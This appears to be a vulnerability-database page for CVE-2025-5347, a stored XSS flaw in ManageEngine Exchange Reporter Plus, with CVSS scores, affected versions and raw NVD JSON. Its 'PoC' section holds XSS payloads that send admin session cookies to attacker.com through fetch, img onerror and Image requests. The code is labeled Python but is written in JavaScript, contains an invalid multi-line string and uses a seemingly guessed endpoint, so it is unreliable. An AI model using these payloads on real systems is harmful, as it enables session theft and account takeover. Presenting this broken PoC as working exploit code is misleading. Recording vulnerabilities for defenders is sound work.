CVE-2025-5347

Description

Zohocorp ManageEngine Exchange Reporter Plus versions before 5723 are vulnerable to Stored Cross Site Scripting in the reports module.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5700:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5701:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5702:*:*:*:*:*:* - VULNERABLE

ManageEngine Exchange Reporter Plus < 5723

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-5347 PoC - Stored XSS in ManageEngine Exchange Reporter Plus
// This PoC demonstrates how to exploit the stored XSS vulnerability

// Step 1: Inject malicious JavaScript via report creation
const xssPayload = '<script>\n  // Steal session cookies
  fetch("https://attacker.com/steal?cookie=" + encodeURIComponent(document.cookie));
  // Or perform actions on behalf of the user
  // document.location = "https://attacker.com/phishing";
</script>';

// Example HTTP POST request to create a malicious report
const exploitReport = {
  method: 'POST',
  path: '/api/reports',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <session_token>'
  },
  body: JSON.stringify({
    reportName: 'Test Report' + xssPayload,
    reportDescription: '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">'+
                       '<script>new Image().src=\'https://attacker.com/capture?c=\'+document.cookie</script>',
    module: 'reports',
    // Other required parameters...
  })
};

// Step 2: When admin views the report, XSS executes
// The malicious script will:
// 1. Extract session cookies/tokens
// 2. Send them to attacker-controlled server
// 3. Potentially perform actions as the logged-in user

// Simple detection PoC:
const simplePoc = '<script>alert("XSS CVE-2025-5347")</script>';
// Inject this into report name field and trigger when viewed

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-5347
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-5347
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-5347/
[4] VulDB https://vuldb.com/cve/CVE-2025-5347
[5] https://www.manageengine.com/products/exchange-reports/advisory/CVE-2025-5347.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-5347", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2025-10-30T15:15:40.640", "lastModified": "2025-11-07T01:46:11.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine Exchange Reporter Plus versions before 5723 are vulnerable to Stored Cross Site Scripting in the reports module."}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.7", "matchCriteriaId": "3DA0580F-8167-450E-A1E9-0F1F7FC7E2C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:-:*:*:*:*:*:*", "matchCriteriaId": "3FC399C6-4299-4744-9FC5-13CFE7478164"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5700:*:*:*:*:*:*", "matchCriteriaId": "E913F3D6-9F94-4130-94FF-37F4D81BAEF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5701:*:*:*:*:*:*", "matchCriteriaId": "34D23B58-2BB8-40EE-952C-1595988335CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5702:*:*:*:*:*:*", "matchCriteriaId": "322920C4-4487-4E44-9C40-2959F478A4FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5703:*:*:*:*:*:*", "matchCriteriaId": "3AD735B9-2CE2-46BA-9A14-A22E3FE21C6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5704:*:*:*:*:*:*", "matchCriteriaId": "014DB85C-DB28-4EBB-971A-6F8F964CE6FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5705:*:*:*:*:*:*", "matchCriteriaId": "5E9B0013-ABF8-4616-BC92-15DF9F5CB359"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5706:*:*:*:*:*:*", "matchCriteriaId": "5B744F32-FD43-47B8-875C-6777177677CD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5707:*:*:*:*:*:*", "matchCriteriaId": "F1BB6EEA-2BAA-4C48-8DA8-1E87B3DE611F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5708:*:*:*:*:*:*", "matchCriteriaId": "D3012C17-87F5-4FFD-B67B-BEFF2A390613"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5709:*:*:*:*:*:*", "matchCriteriaId": "1E33D368-2D81-4C7E-9405-7C0A86E97217"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5710:*:*:*:*:*:*", "matchCriteriaId": "7AA9384F-6401-4495-B558-23E5A7A7528C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5711:*:*:*:*:*:*", "matchCriteriaId": "E492F955-0734-4AE4-A59F-572ADF0CFE75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5712:*:*:*:*:*:*", "matchCriteriaId": "11B71FFC-FD2E-4F84-BB1E-55BCA5B51099"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5713:*:*:*:*:*:*", "matchCriteriaId": "531AFEFB-BBE6-42B2-8D37-B4098324AA87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5714:*:*:*:*:*:*", "matchCriteriaId": "01F80C71-110D-4776-B13F-08FCDE125B81"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5715:*:*:*:*:*:*", "matchCriteriaId": "2A6D8AAD-49B9-4216-9A81-A449A5D5549C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5717:*:*:*:*:*:*", "matchCriteriaId": "852DBCE6-B926-4B5B-B8C2-86569355153D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5718:*:*:*:*:*:*", "match ... (truncated)